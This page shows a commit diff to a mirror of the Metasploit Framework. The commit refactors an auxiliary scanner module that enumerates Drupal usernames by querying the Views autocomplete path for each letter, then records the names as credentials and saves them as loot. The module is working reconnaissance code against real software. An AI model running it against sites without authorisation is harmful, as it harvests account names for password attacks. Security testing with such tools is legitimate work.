infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix bugs in drupal_views_user_enum.

bug/bundler_fix
Roberto Soares 2015-10-04 05:53:54 -03:00
parent fc09eaf517
commit ed8f5456a4
1 changed files with 28 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

56
modules/auxiliary/scanner/http/drupal_views_user_enum.rb
View File

@ -44,19 +44,21 @@ class Metasploit3 < Msf::Auxiliary
end end
def check_host(ip) def check_host(ip)
res = send_request_cgi({ res = send_request_cgi(
'uri' => base_uri, 'uri' => base_uri,
'method' => 'GET', 'method' => 'GET',
'headers' => { 'Connection' => 'Close' } 'headers' => { 'Connection' => 'Close' }
}, 25) )
if not res unless res
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
elsif res and res.body =~ /\<title\>Access denied/ end
if res.body.include?('Access denied')
# This probably means the Views Module actually isn't installed # This probably means the Views Module actually isn't installed
vprint_error("#{rhost} - Access denied") print_error("#{peer} - Access denied")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
elsif res and res.message != 'OK' or res.body != '[ ]' elsif res.message != 'OK' || res.body != '[ ]'
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
else else
return Exploit::CheckCode::Appears return Exploit::CheckCode::Appears
@ -94,59 +96,57 @@ class Metasploit3 < Msf::Auxiliary
return return
end end
print_status("Begin enumerating users at #{ip}") print_status("Begin enumerating users at #{vhost}")
results = [] results = []
('a'..'z').each do |l| ('a'..'z').each do |l|
vprint_status("Iterating on letter: #{l}") vprint_status("Iterating on letter: #{l}")
res = send_request_cgi({ res = send_request_cgi(
'uri' => base_uri+l, 'uri' => "#{base_uri}#{l}",
'method' => 'GET', 'method' => 'GET',
'headers' => { 'Connection' => 'Close' } 'headers' => { 'Connection' => 'Close' }
}, 25) )
if (res and res.message == "OK") if res && res.message == 'OK'
user_list = res.body.scan(/\w+/) begin
user_list = JSON.parse(res.body)
rescue JSON::ParserError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
return []
end
if user_list.empty? if user_list.empty?
vprint_line("\tFound: Nothing") vprint_error("Not found with: #{l}")
else else
vprint_line("\tFound: #{user_list.inspect}") vprint_good("Found: #{user_list}")
results << user_list results << user_list.flatten.uniq
end end
else else
print_error("Unexpected results from server") print_error("#{peer} - Unexpected results from server")
return return
end end
end end
final_results = results.flatten.uniq print_status("Done. #{results.length} usernames found...")
results.flatten.uniq.each do |user|
print_status("Done. " + final_results.length.to_s + " usernames found...")
final_results.each do |user|
print_good("Found User: #{user}") print_good("Found User: #{user}")
report_cred( report_cred(
ip: Rex::Socket.getaddress(datastore['RHOST']), ip: Rex::Socket.getaddress(datastore['RHOST']),
port: datastore['RPORT'], port: datastore['RPORT'],
user: user, user: user,
proof: base_uri+l proof: base_uri
) )
end end
# One username per line results = results * "\n"
final_results = final_results * "\n"
p = store_loot( p = store_loot(
'drupal_user', 'drupal_user',
'text/plain', 'text/plain',
Rex::Socket.getaddress(datastore['RHOST']), Rex::Socket.getaddress(datastore['RHOST']),
final_results.to_s, results.to_s,
'drupal_user.txt' 'drupal_user.txt'
) )
print_status("Usernames stored in: #{p}") print_status("Usernames stored in: #{p}")
end end
end end